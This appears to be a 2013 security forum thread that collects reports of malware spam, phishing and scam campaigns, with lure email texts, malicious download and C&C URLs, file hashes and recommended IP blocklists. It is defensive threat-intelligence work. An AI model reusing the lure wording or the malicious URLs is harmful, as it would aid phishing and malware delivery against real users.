my undressed image is attached
Typical e-mail details:
zdjakinuii fgcaba rjgvsy
vyjxsvlsa luoans vnlfo
aovkq I R W Q G A L S C M R
caeqmjj W R P L P D A F
Malicious File Name and MD5:
mypic62.zip (f2845f8eeeb5e8b2985fdd2c7636bc39)
mypic.vcr (118980814772348b8e42a5166a4dc2a1)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2d8334b0fd78346352826324fe2d9b07/tumblr_inline_mq1a30XZRB1qz4rgp.png
___
Fake Invoice SPAM / doc201307161139482.doc
- http://blog.dynamoo.com/2013/07/invoice-48920-spam-doc201307161139482doc.html
16 July 2013 - "This spam has a malicious word attachment, doc201307161139482.doc which contains an exploit.
From: Carlos Phillips [accounting @travidia .com]
Subject: Invoice 48920
Thanks !!
Greg
Precision Assemblies Products, Inc.Llc.
179 Nesbitt Hills
Holley, NY 51902
(176)-674-6500
nightmarewdp50 @travidia .com
Note that the date is included into the filename. The document has an MS12-027 exploit with a VirusTotal detection rate of just 5/47*. In theory, if your copy of Microsoft Word is up-to-date you should be immune to this...
UPDATE: The ThreatTrack report [pdf**] shows similar characterstics, including an attempted download from [donotclick]mycanoweb .com/report/doc.exe which is a Zbot variant with a low detection rate***... Most of the IPs for mycanoweb .com overlap with these belonging to the Amerika gang. The other two IPs are shared hosting and might block a relatively small number of legitimate sites.. I would lean towards blocking them now and unblock them later it there's a problem.
Recommended blocklist:
mycanoweb .com
classified.byethost11 .com
myhomes.netau .net
46.45.182.27
50.97.253.162
59.126.142.186
188.40.92.12
209.222.67.251
209.190.24.9
31.170.160.129
Additional IPs for Zbot component:
182.237.17.180
194.44.219.226
210.56.23.100 ..."
* https://www.virustotal.com/en-gb/file/8ae7ae35c37a618031c3ec0702871dc19c817bff4e5cf54f1169182fdc8d878c/analysis/
** http://www.dynamoo.com/files/analysis_31740_935e5cacde136d006ea1bb1201a3e6ef.pdf
*** https://www.virustotal.com/en-gb/file/ac5b73189bfdd5d282778c067f0fa986aaeab295375a0d85c2a2e027f632e3b6/analysis/1373989372/
___
Dun and Bradstreet Attachment Spam
- http://threattrack.tumblr.com/post/55605735892/dun-and-bradstreet-attachment-spam
July 16, 2013 - "Subjects Seen:
FW : Complaint - <random>
Typical e-mail details:
Dun & Bradstreet has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
In the interest of time and good customer relations, please provide the DnB with written verification of your position in this matter by June 8, 2013. Your prompt response will allow DnB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter...
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Malicious URLs
b-markenergy .com/ponyb/gate.php
arizonaenergysuppliers .com/ponyb/gate.php
alabamaenergysuppliers .com/ponyb/gate.php
bemarkenergy .com/ponyb/gate.php
costruzionimediterraneo .it/FP0gd6.exe
preview.vibration-trainers .com/V2YE.exe
Malicious File Name and MD5:
Case_<random>.zip (b3f17fd862e5e7C617240251be8de706)
Case_<random>.exe (59ee4453da8909e96762f2c8cd0d6f37)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/41b690466827e81b5411fff564d83ed5/tumblr_inline_mq1bpz6ea31qz4rgp.png
___
Spamvertised Payroll themed emails lead to malware
- http://blog.webroot.com/2013/07/16/spamvertised-vodafone-u-k-mms-idfake-sage-50-payroll-themed-emails-lead-to-identical-malware/
July 16, 2013 - "We’ve intercepted two, currently circulating, malicious spam campaigns enticing users into executing the malicious attachments found in the fake emails. This time the campaigns are impersonating Vodafone U.K or pretending to be a legitimate email generated by Sage 50's Payroll software...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/07/email_spam_fake_spamvertised_malware_malicious_software_social_engineering_payslip_sage50.png
... What’s particularly interesting about these two campaigns is the fact that they’ve both been launched by the same cybercriminal/gang of cybercriminals. Not only do the campaigns use an identical MD5 with two previously profiled malicious spam campaigns, but also, all the MD5s phone back to the same C&C server - hxxp:// 62.76.178.178 /fexco/com/index.php
Detection rate for the unique MD5 used in the fake Vodafone U.K MMS themed campaign: 4e9d834fcc239828919eaa7877af49dd * ... Backdoor.Win32.Androm.abrz; Troj/Agent-ACLZ..."
* https://www.virustotal.com/en/file/b5f0426350db94a6ff7706bf67444d2af7334574a5da96dc7a0d01def966fd16/analysis/
File name: vt-upload-b6gNq
Detection ratio: 8/47
Analysis date: 2013-07-14
___
Fake Bank of America SPAM / stid 36618-22.zip
- http://blog.dynamoo.com/2013/07/bank-of-america-spam-stid-36618-22zip.html
16 July 2013 - "This fake Bank of America spam comes with a malicious attachment:
Date: Tue, 16 Jul 2013 21:21:06 +0200 [15:21:06 EDT]
From: Joyce Bryson [legalsr @gmail .com]
Subject: Merchant Statement
Enclosed (pdflPDF|pdf file|document|file) is your Bank of America Paymentech electronic Merchant Billing Statement.
If you need assistance, please (contact|message|call) your Account Executive or call Merchant Services at the telephone number listed on your statement.
PLEASE DO NOT RESPOND BY USING REPLY. This (email|mail) is sent from an unmonitored email address, and your response will not be received by Bank of America Paymentech.
Bank of America Paymentech will not be responsible for any liabilities that may result from or relate to any failure or delay caused by Bank of America Paymentech's or the Merchant's email service or otherwise. Bank of America Paymentech recommends that Merchants continue to monitor their statement information regularly...
Attached is a file called stid 36618-22.zip which in turn contains stid 36618-22.exe which is a variant of Zbot. VirusTotal detections are just 11/47*. Anubis reports** what appear to be several peer-to-peer connection attempts plus an attempted download from [donotclick]apsuart .com/741_out.exe that appears to fail..."
* https://www.virustotal.com/en/file/cb2ee3f181e015a25878d7250123118e5c35d8e8e595f8da3ce41a5c5cc8149f/analysis/1374010738/
** http://anubis.iseclab.org/?action=result&task_id=124ca4ff8eeb1c564515cb0db08870d32&format=html
:fear::fear::mad:
AplusWebMaster
2013-07-17, 18:15
FYI...
Fake Reservation Confirmation SPAM / marriott .com.reservation.lookup.viperlair .net
- http://blog.dynamoo.com/2013/07/houston-marriott-westchase-reservation.html
17 July 2013 - "This fake Marriott spam leads to malware on marriott.com.reservation.lookup.viperlair .net:
Date: Wed, 17 Jul 2013 05:12:22 -0800 [09:12:22 EDT]
From: Marriott Hotels & Resorts Reservation [reservations @clients.marriottmail .org]
Reply-To: reservations @clients.marriottmail .org
Subject: Houston Marriott Westchase Reservation Confirmation #86903601
Marriott Hotels & Resorts Houston Marriott Westchase 2900 Briarpark Dr.,
Houston, Texas 77042 USA Phone: 1-713-978-7400 Fax: 1-713-735-2726
Reservation for [redacted]
Confirmation Number: 86903601
Check-in: Sunday, July 21, 2013 (03:00 PM)
Check-out: Wednesday, July 24, 2013 (12:00 PM)
Modify or Cancel reservation ...
The -link- in the email goes through a legitimate -hacked- site and lands on [donotclick]marriott.com.reservation.lookup.viperlair .net/news/marriott-ebill-order-confirmation.php (report here*) hosted on the following IPs:
(viperlair .net is registered with -fake- WHOIS details that mark it out as belonging to the Amerika gang...)
50.97.253.162 (Softlayer, US)
59.126.142.186 (Chunghwa Telecom, Taiwan)
209.222.67.251 (Razor Inc, US)
Recommended blocklist:
50.97.253.162
59.126.142.186
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3804348
___
"PC Wizard" tech support SCAM
- http://blog.dynamoo.com/2013/07/02086-547426-pc-wizard-tech-support-scam.html
17 July 2013 - "Just a quick one.. some Indian scammers routing through a UK number 02086 547426 (02086547426) and purporting to be from a company "PC Wizard" just called and tried to convince me that something was wrong with my PC.
I'll do a write up later.. but in the mean time their MO is to get you to look at your Event Viewer for errors (there are always errors), and then visit ammyy .com to run some remote control software. DO NOT LET THEM DO THIS!"
- http://centralops.net/co/DomainDossier.aspx
canonical name ammyy.com
addresses 70.38.40.185
OriginAS: AS32613 *
City: Moscow ...
Country: RU ...
* https://www.google.com/safebrowsing/diagnostic?site=AS:32613
"... over the past 90 days, 1721 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-07-17, and the last time suspicious content was found was on 2013-07-17... we found 313 site(s) on this network... that appeared to function as intermediaries for the infection of 794 other site(s)... We found 280 site(s)... that infected 1790 other site(s)..."
:fear::mad:
AplusWebMaster
2013-07-18, 19:10
FYI...
Site primrose .co .uk hacked, emails compromised
- http://blog.dynamoo.com/2013/07/primrosecouk-hacked-emails-compromised.html
18 July 2013 - "Garden accessory primroseb.co .uk has been -hacked- and email addresses stored in their system are being abused for phishing purposes:
From: paypal .co .uk [service @paypal .co .uk]
Date: 18 July 2013 11:01
Subject: We cannot process your payment at this time.
Dear,
We need your help resolving an issue with your account.To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account.We want to work with you to get your account back to normal as quickly as possible.
What's the problem ? It's been a little while since you used your account.For reasons relating to the safe use of the PayPal service we need some more information about your account.
Reference Number: PP-001-278-254-803
It's usually quite straight forward to take care of these things.Most of the time, we just need some more information about your account or latest transactions.
1. Download the attached document and open it in a browser window secure.
2. Confirm that you are the account holder and follow the instructions.
Yours sincerely,
PayPal
Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589
The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www. thesenddirect .com (62.149.142.113 - Aruba, Italy) and submitting the data to www .paypserv .com (62.149.142.152 - also Aruba). The WHOIS details are no doubt -fake- are are respectively:
Saunders, John Alan mahibarayanlol @gmail .com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN
IT
+39.447885623455
----------
Clarke, Victoria johanjo1010 @gmail .com
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
IT
+39.441934862064
Primrose .co .uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything. Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext which is good. Without further information from primrose .co .uk it is impossible to say if any financial data has been compromised."
___
Fake KLWines .com SPAM / prysmm .net
- http://blog.dynamoo.com/2013/07/k-wine-merchants-klwinescom-spam.html
18 July 2013 - "This fake K&L Wine Merchants spam email leads to malware on www. klwines.com.order.complete .prysmm.net:
Date: Thu, 18 Jul 2013 05:57:28 -0800
From: drowsedl04 @inbound.ups .net
Subject: Your K&L order #56920789 is complete
Hello from K&L Wine Merchants -- www. KLWines .com
Just wanted to let you know that your order (#56920789) is complete.
Additional comments for this order: Ship Fri. 7/19
The following items are included...
Item Subtotal: $247.91
Tax: $0.00
Shipping & Handling: $67.18
Total: $315.09
The tracking number for this shipment is 1Z474482A140261050.
Please visit the freight carrier's site for exact shipping pickup and dropoff dates, by clicking on the link below.
To see the latest information about your order, visit "My Account"...
The link in the email goes through a legitimate -hacked- site and ends up on a malware page at [donotclick]www.klwines.com.order.complete.prysmm .net/news/order-information.php (report here*) hosted on:
50.97.253.162 (Softlayer, US)
59.126.142.186 (Chungwa Telecom, Taiwan)
203.236.232.42 (KINX, Korea)
209.222.67.251 (Razor Inc, US)
The -fake- WHOIS details mark this out as belonging to the Amerika gang...
Recommended blocklist:
50.97.253.162
59.126.142.186
203.236.232.42
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3833979
___
Fake QuickBooks Overdue Payment SPAM
- http://threattrack.tumblr.com/post/55778161657/quickbooks-overdue-payment-spam
July 18, 2013 - "Subjects Seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 07/18/2013 as outlines under our “Payment Terms" agreement.
Thank you for your business,
Sincerely,
Nathan Phipps
Malicious URLs
prospexleads .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
picaletter .com/ZDpczi37.exe
s268400504.onlinehome .us/v73.exe
wineoutleteventspace .com/7UNFVh.exe
Malicious File Name and MD5:
invoice_<random>.zip (9E2221D918E83ED2B264214F5DDAB9FF)
invoice_<random>.exe (06C3A27772C2552A28C32F82583B7645)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/058de12167fb84c0e44eaa0653226d71/tumblr_inline_mq4vwydiSE1qz4rgp.png
___
Wells Fargo Important Documents Spam
- http://threattrack.tumblr.com/post/55794599243/wells-fargo-important-documents-spam
July 18, 2013 - "Subjects Seen:
IMPORTANT Documents - WellsFargo
Typical e-mail details:
Please review attached files.
Alyce_Granger
Wells Fargo Advisors
Malicious URLs
prospexleads .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
ciclografico .pt/9Up.exe
mdebra.o2switch .net/2ccVsM9z.exe
magusdev .com/YSQsWZVU.exe
splendidhonda .com/Hb3qCt.exe
Malicious File Name and MD5:
DOC_<name>.zip (44A3AFFC21D0BA3E4CA5ACE0732C6D65)
DOC_{_MAILTO_USERNAME}.exe (4A182976242CF4F65B6F219D649B0A98)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/49c85c41891dfc78034a28e9a6a6b164/tumblr_inline_mq58ozzlo31qz4rgp.png
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Video Sharing Email Messages - 2013 Jul 18
Fake Product Order Quotation Email Messages - 2013 Jul 18
Malicious Attachment Email Messages - 2013 Jul 18
Email Messages with Malicious Attachments - 2013 Jul 18
Fake Money Transfer Notification Email Messages - 2013 Jul 18
Fake Product Supply Request Email Messages - 2013 Jul 18
Malicious Personal Pictures Attachment Email Messages - 2013 Jul 18
Malicious Attachment Email Messages - 2013 Jul 18
Fake Money Transfer Notification Email Messages - 2013 Jul 18
Fake Invoice Statement Attachment Email Messages - 2013 Jul 18
Fake Customer Complaint Attachment Email Messages - 2013 Jul 18
Fake Picture Link Email Messages - 2013 Jul 18
Fake Fund Transfer Confirmation Email Messages - 2013 Jul 18
Fake Order Information Email Messages - 2013 Jul 18
Fake Tax Report Documentation Email Messages - 2013 Jul 18
Fake Product Quote Request Email Messages - 2013 Jul 18
Fake Product Quotation Request Email Messages - 2013 Jul 18
(More detail and links at the cisco URL above.)
:fear::fear: :mad:
AplusWebMaster
2013-07-19, 18:02
FYI...
Who's Who SCAM
whoswhonetworkonline .com
- http://blog.dynamoo.com/2013/07/whoswhonetworkonlinecom-spam.html
19 July 2013 - "This turd of an email was sent to an info@ email address on a domain I own. It appears to be a classic Who's Who scam*.
* https://en.wikipedia.org/wiki/Who%27s_Who_scam
From: Who's Who [cpm2 @contactwhoswho .us]
Reply-To: databaseemailergroup @gmail .com
date: 19 July 2013 05:44
subject: You were recently nominated into Who's Who Amoung Executives
Who's Who Network Online
Hello,
As you are probably aware, in the last few weeks, we at the Who's Who Among Executives and Proefssionals have reached out to several hundred individuals for placement in our upcoming 2013 edition of our directory. You were contacted, but we did not receive any of your biographical information. We would like to give you another opportunity to do so...
Clicking on the link takes you to whoswhonetworkonline .com hosted on 66.11.129.87 (Stafford Associates Computer Specialists Inc., New York). The WHOIS details are hidden.
Screenshot: https://lh3.ggpht.com/-LAZAcu9_sfE/Uek4VdMyPaI/AAAAAAAABhk/HXehA4zUiVw/s400/whoswhonetworkonline.png
There's no clue anywhere on the site or in the email about who is behind the spam. There is no corporation in New York with the exact name "Who's Who Network Online" although there are several similar sounding entities. However, there are some clues in the headers of the email that link it through to another recent and similarly-themed spam... The email originates from a Comcast IP address of 174.58.75.1 in West Florida, and then routes through a server at 192.217.104.157 (NTT America) which has the hostname contactwhoswho.us which is consistent with the cpm2 @contactwhoswho .us sender's address...
Darin Delia appears to be the same person who was sending out Spotlite Radio spam**..."
** http://blog.dynamoo.com/2013/04/spotlite-radio-spotliteradio2013com-spam.html
___
Bank of America Transaction Completed Spam
- http://threattrack.tumblr.com/post/55870699152/bank-of-america-transaction-completed-spam
19 July 2013 - "Subjects Seen:
Your transaction is completed
Typical e-mail details:
Transaction is completed. $99479350 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Receipt on payment is attached.
Malicious File Name and MD5:
payment receipt(copy).zip (F87DB429BED542ED6D26ACF8924280FB)
payment receipt(copy).exe (22C694FDA2FF8BECC447D1BE198A74DC)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/e1bdaf55d55cd4cb9ddc658bac93e877/tumblr_inline_mq6s3eO0qX1qz4rgp.png
___
Fake Verizon Wireless "Data Usage Overage Alert" / verizonwirelessreports .com
- http://blog.dynamoo.com/2013/07/verizon-wireless-data-usage-overage.html
20 July 2013 - "This fake Verizon email leads to malware on the domain onemessage.verizonwireless.com.verizonwirelessreports .com:
Date: Fri, 19 Jul 2013 10:48:31 -0500 [11:48:31 EDT]
From: Verizon Wireless [VZWMail @e-marketing. verizonwireless-mail .net]
Subject: Data Usage Overage Alert
Important Information About Your Account. View Online
verizon wireless Explore Shop My Verizon Support
Important Information About Your Data Usage
Your account has used your data allowance for this month and you may now be billed overage charges. Your monthly data allowance will reset on the 20th.
Run an Account Analysis in My Verizon to analyze your recent months' data usage and review your plan options.
Don't forget, you can also manage your alert settings in My Verizon including adding recipients and opting out of specific alerts.
Thank you for choosing Verizon Wireless.
Details as of:
[redacted]
07/19/2013 02:15 AM EDT
We respect your privacy. Please review our privacy policy for more information
about click activity with Verizon Wireless and links included in this email.
This email was sent to [redacted];
ID: [redacted]
The -link- in the email goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]onemessage.verizonwireless.com.verizonwirelessreports .com/news/verizon-bill.php (report here*) hosted on:
172.255.106.126 (Nobis Technology Group, US / Creative Factory Beijing, China)
188.134.26.172 (Perspectiva Ltd, Russia)
The domain verizonwirelessreports .com is -fake- and was recently registered to an anonymous person. However, given the IPs and associated domains then this is clearly the work of this gang.
Blocklist:
172.255.106.126
188.134.26.172
verizonwirelessreports .com
firerice .com
onemessage.verizonwireless .com.verizonwirelessreports.com
package.ups.com.shanghaiherald .net
epackage.ups.com.shanghaiherald .net
vitans .net
www. klwines .com.order.complete.prysmm .net
prysmm .net
shanghaiherald .net"
* http://urlquery.net/report.php?id=3863421
:fear: :mad:
AplusWebMaster
2013-07-20, 17:11
FYI...
Fake BBC website SPAM hits Twitter
- http://www.threattracksecurity.com/it-blog/fake-bbc-website-spam-hits-twitter/
July 19, 2013 - "There’s a spam-run doing the rounds right now which uses a -fake- BBC website to drive traffic to a diet pill website:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc1.jpg
... All of the posts use the hashtag “Amazing”, with a link to a fake BBC URL + 6 seemingly random numbers:
#amazing newslinkbbc(dot)co(dot)uk/??[6 digits]
The above URL was registered in August 2011. Additionally, there are more fake BBC sites located at mailbbc(dot)co(dot)uk (registered August 2011, on the same day as the URL currently being posted to Twitter) and securebbc(dot)co(dot)uk (registered August 2012). At least one other URL has been up for debate in years gone by in relation to the person claiming ownership of newslinkbbc and mailbbc. Clicking
newslinkbbc(dot)co(dot)uk takes end-users to world-bbc(dot)co(dot)uk (registered August 2012):
Fake BBC Spam site..
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc2.jpg
... The above site advertises a weightloss diet designed to remove belly fat. The live link on the site leads to bbchost(dot)altervista(dot)org/news/health-21434875/try-garcinia-now which -redirects- to
pgc(dot)my-secure-orders(dot)com/?clickid=
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/amazingbbc3.jpg
The site is promoting the formerly mentioned diet pills... We’ve seen 360+ of these links being spammed on Twitter... and no doubt the spam will continue to grow before Twitter gets a handle on the situation. For now, be very wary of any and all links being spammed with the #amazing hashtag, and [i]if you find yourself spamming the same Tweets then change your password and remove any apps tied to your account that you don’t remember adding (or indeed, have added recently but don’t feel so confident about anymore)."
:fear: :mad:
AplusWebMaster
2013-07-21, 16:48
FYI...
Malicious URLs in .lc zone
- https://www.securelist.com/en/blog/9103/Malicious_URLs_in_lc_zone
July 20, 2013 - "While analyzing suspicious URLs I found out that more and more malicious URLs are coming from .lc domain, which formally belongs to Santa Lucia* country located in in the eastern Caribbean Sea. Our statistics confirm this trend.
> https://www.securelist.com/en/images/pictures/klblog/9106.png
Cybercriminals from different places of the world are actively using this domain, including cybercriminals from Brazil abusing free Web hosting available in that country.
> https://www.securelist.com/en/images/pictures/klblog/9104.jpg
How many legitimate domains at .lc zone have you ever had to visit in your life? If the answer is zero, so maybe it’s time to start filtering access to this domain, especially on the corporate Firewall / Proxy layer."
* https://en.wikipedia.org/wiki/Saint_Lucia
___
PlugX malware factory revisited... Smoaler
- http://atlas.arbor.net/briefs/index#-1265345240
High Severity
July 19, 2013
The Smoaler malware has been uncovered and is involved in targeted attacks. Organizations that may have been targeted would benefit from careful analysis of this information and associated indicators.
Analysis: Targeted attack campaigns continue as usual. As actors are discovered, their techniques, tactics and procedures evolve. While the technique of running malware in memory is not new, it is put into practice here, and the final payload varies. While many targeted attacks still involve only the amount of force necessary to compromise the targeted, many other attack campaigns that have yet to be unmasked are surely in operation.
Source: http://nakedsecurity.sophos.com/2013/07/15/the-plugx-malware-factory-revisited-introducing-smoaler/
- https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 - 9.3 (HIGH) / MS12-027
Last revised: 03/07/2013
:fear: :mad:
AplusWebMaster
2013-07-22, 19:49
FYI...
Bitcoin mining tools in the wild...
- http://blog.webroot.com/2013/07/22/yet-another-commercially-available-stealth-bitcoinlitecoin-mining-tool-spotted-in-the-wild/
July 22, 2013 - "Cybercriminals continue releasing new, commercially available, stealth Bitcoin/Litecoin mining tools, empowering novice cybercriminals with the ability to start monetizing the malware-infected hosts part of their botnets, or the ones they have access to which they’ve purchased through a third-party malware-infected hosts selling service...
Sample screenshots of the stealth Bitcoin/Litecoin mining tool’s admin panel:
> https://webrootblog.files.wordpress.com/2013/07/stealth_bitcoin_litecoin_mining_tool.png
.
> https://webrootblog.files.wordpress.com/2013/07/stealth_bitcoin_litecoin_mining_tool_01.png
... the cybercriminal behind it released it in a way that would prevent its mass spreading, supposedly due to the fact that he doesn’t want to attract the attention of security vendors whose sensor networks would easily pick up any massive campaigns featuring the miner. Therefore, he’s currently offering a limited number of copies of this miner. Over the last couple of months we’ve been intercepting multiple subscription-based or DIY type of stealth Bitcoin/Litecoin miners, indicating that the international underground marketplace is busy responding to the demand for such type of tools. Despite the fact that Bitcoin is a ‘trendy’ E-currency, we believe that for the time being, Russian and Eastern European cybercrime gangs will continue to maintain a large market share of the underground’s market profitability metric, due to their utilization of mature, evasive, and efficient monetization tactics..."
Bitcoin Mining by Botnet...
- https://krebsonsecurity.com/2013/07/botcoin-bitcoin-mining-by-botnet/
July 18, 2013
___
Fake American Airlines SPAM / sai-uka-sai .com
- http://blog.dynamoo.com/2013/07/american-airlines-spam-sai-uka-saicom_22.html
22 July 2013 - "This fake American Airlines spam leads to malware on www .aa .com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai .com:
From: American.Airlines@aa .net
Date: 22 July 2013 17:22
Subject: AA.com Itinerary Summary On Hold
Dear customer,
Thank you for making your travel arrangements on AA.com! Your requested itinerary is now ON HOLD. Details below.
To ensure that your reservation is not canceled you must complete the purchase of this reservation by clicking the “Purchase” button on this email, or by using the “View/Change Reservations” section on www .aa .com.
left corners left corners
This reservation is on HOLD until July 22, 2013 11:59 PM CDT (Central Daylight Time) ...
The link in the email goes through a legitimate -hacked- site and ends up on a malware landing page at [donotclick]www.aa.com.reservation.viewFareRuleDetailsAccess.do.sai-uka-sai .com/news/american-airlines-hold.php (report here*) hosted on the following IPs:
50.97.253.162 (Softlayer, US**)
95.111.32.249 (Megalan / Mobitel EAD, Bulgaria)
188.134.26.172 (Perspectiva Ltd, Russia)
209.222.67.251 (Razor Inc, US)
The WHOIS details for that domain are the characteristically -fake- ones...
Recommended blocklist:
50.97.253.162
95.111.32.249
188.134.26.172
209.222.67.251 ..."
* http://urlquery.net/report.php?id=3928752
Diagnostic page for AS36351 (SOFTLAYER)
** https://www.google.com/safebrowsing/diagnostic?site=AS:36351
"... over the past 90 days, 5148 site(s)... served content that resulted in malicious software being downloaded and installed without user consent. The last time Google tested a site on this network was on 2013-07-22, and the last time suspicious content was found was on 2013-07-22... Over the past 90 days, we found 662 site(s) on this network... that appeared to function as intermediaries for the infection of 2618 other site(s)... this network has hosted sites that have distributed malicious software in the past 90 days. We found 868 site(s)... that infected 6671 other site(s)..."
___
Fake BMW SPAM / pagebuoy .net
- http://blog.dynamoo.com/2013/07/bmw-spam-pagebuoynet.html
22 July 2013 - "This convincing looking BMW spam leads to malware ...
Date: Mon, 22 Jul 2013 13:07:50 -0500 [14:07:50 EDT]
From: BMW of North America [womanliere75 @postmaster.aa-mail .org]
Reply-To: [redacted]@m.aa-mail .com
Subject: The BMW 6-Series M Sport Edition, M Universe, and more.
BMW’s 6-Series M Sport Edition View Online
BMW
A 6 SERIES.
WITH M PANACHE.
Meet the 6-Series M Sport Edition. Available in all 6 series models, the M Sport Edition boasts premium features like M Aerodynamics, LED Adaptive Headlights, an M leather steering wheel, and Nappa Leather sport seats for a ride that’s a 6-Series inside and out.
LEARN MORE
Efficient Dynamics
Table of Contents
» BMW M Universe
» BMW Wins Again
» BMW i3 Design
» BMW Superbike
» BMW Collections
WELCOME TO M’S NEW HOME.
In the M Universe, your own M photos will become part of a visual timeline spanning all 40 award-winning years of the iconic M brand, from the classic 1972 to the new M6 Gran Coupe. To all you M fans, welcome home.
» ENTER BMW M UNIVERSE
THE 3 SERIES WINS AGAIN
The BMW 3 Series continues to live up to its hard-earned reputation as the best compact sports sedan in the world. AUTOMOBILE MAGAZINE presented the 3 Series with the coveted 2013 All-Star award, making the number of AUTOMOBILE MAGAZINE awards won by the 3 Series alone over a dozen.
» BUILD YOUR OWN ...
Screenshot: https://lh3.ggpht.com/-NQsSlwUYaOI/Ue2BI90munI/AAAAAAAABi4/3QqveMDdfc0/s400/bmw-spam.jpg
The link in the email goes through a legitimate -hacked- site and ends up on [donotclick]links.emails.bmwusa.com.open.pagebuoy .net/news/bmw-newmodel.php (report here*) which is hosted on the same IP addresses as this spam run**."
* http://urlquery.net/report.php?id=3929867
** http://blog.dynamoo.com/2013/07/american-airlines-spam-sai-uka-saicom_22.html
___
NY Better Business Bureau Spam
- http://threattrack.tumblr.com/post/56167753478/ny-better-business-bureau-spam
July 22, 2013 - "Subjects Seen:
FW: Case <removed>
Typical e-mail details:
The Better Business Bureau has received the above-referenced complaint from one of your customers regarding their dealings with you. The details of the consumer’s concern are included on the reverse. Please review this matter and advise us of your position.
As a neutral third party, the Better Business Bureau can help to resolve the matter. Often complaints are a result of misunderstandings a company wants to know about and correct.
In the interest of time and good customer relations, please provide the BBB with written verification of your position in this matter by June 30, 2013. Your prompt response will allow BBB to be of service to you and your customer in reaching a mutually agreeable resolution. Please inform us if you have contacted your customer directly and already resolved this matter.
The Better Business Bureau develops and maintains Reliability Reports on companies across the United States and Canada . This information is available to the public and is frequently used by potential customers. Your cooperation in responding to this complaint becomes a permanent part of your file with the Better Business Bureau. Failure to promptly give attention to this matter may be reflected in the report we give to consumers about your company.
We encourage you to print this complaint (attached file), answer the questions and respond to us.
We look forward to your prompt attention to this matter.
Sincerely ...
Malicious URLs
yourprospexblog .com:8080/ponyb/gate.php
myimpactblog .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
prospexleads .com:8080/ponyb/gate.php
moneyinmarketing .com/dL1.exe
abbeyevents .co .uk/fNF1.exe
salsaconfuego .com/RCY.exe
fales .info/PwvextRo.exe
Malicious File Name and MD5:
Complaint_<date>.zip (B82478381DCECD63B81F64EDF7632D51)
Complaint_<date>.zip (95B542B1BCBD7D5AEE65F97E9125D90C)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9867f46a3b154e7ed25177d8ef519c00/tumblr_inline_mqcrjiUJgV1qz4rgp.png
___
Fake IRS "Complaint Case #488870383295" SPAM / Complaint_488870383295.zip
- http://blog.dynamoo.com/2013/07/irsgov-complaint-case-488870383295-spam.html
22 July 2013 -"This spam contains a malicious attachment, but seems to confuse the roles of the BBB and the IRS.
Date: Mon, 22 Jul 2013 09:59:08 -0500 [10:59:08 EDT]
From: "IRS.gov" [fraud .dep @irs. gov]
Subject: Complaint Case #488870383295
You have received a complaint in regards to your business services.
The complaint was filled by Mr./Mrs. Ulivo DELERME on 07/22/2013/
Case Number: 488870383295
Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.
Disputes involving consumer products and/or services may be arbitrated. Unless they directly relate to the contract that is the basis of this dispute, the following claims will be considered for arbitration only if all parties agree in writing that the arbitrator may consider them: Claims based on product liability; Claims for personal injuries; Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.
The decision as to whether your dispute or any part of it can be arbitrated rests solely with the IRS.
The IRS offers a binding arbitration service for disputes involving marketplace transactions. Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.
2013 Council of IRS, Inc. All Rights Reserved.
Attached to the email is a ZIP file Complaint_488870383295.zip which in turn contains an executable Complaint_07222013.exe which is bad news. VirusTotal detection rates are a so-so 14/47*... the Malwr analysis** seems to be the most comprehensive and shows traffic out the the following compromised sites:
prospexleads .com
phonebillssuck .com
moneyinmarketing .com
abbeyevents .co.uk
salsaconfuego .com
fales .info
The second part has a much lower detection rate of just 2/47. At the moment this second stage is still being analysed."
* https://www.virustotal.com/en/file/d9a07efbf2c59f1d13fa37854bf85d6334131bfcf3797eca0e8d677b1fcf3da4/analysis/1374520022/
** https://malwr.com/analysis/MGIxNjJjYzM1OTlkNDgxNGJmYmM4ODE1YzE4Yzc0ZGI/
:mad: :sad: :fear:
AplusWebMaster
2013-07-23, 17:43
FYI...
Fake Media Player - rogue video Downloader PUA
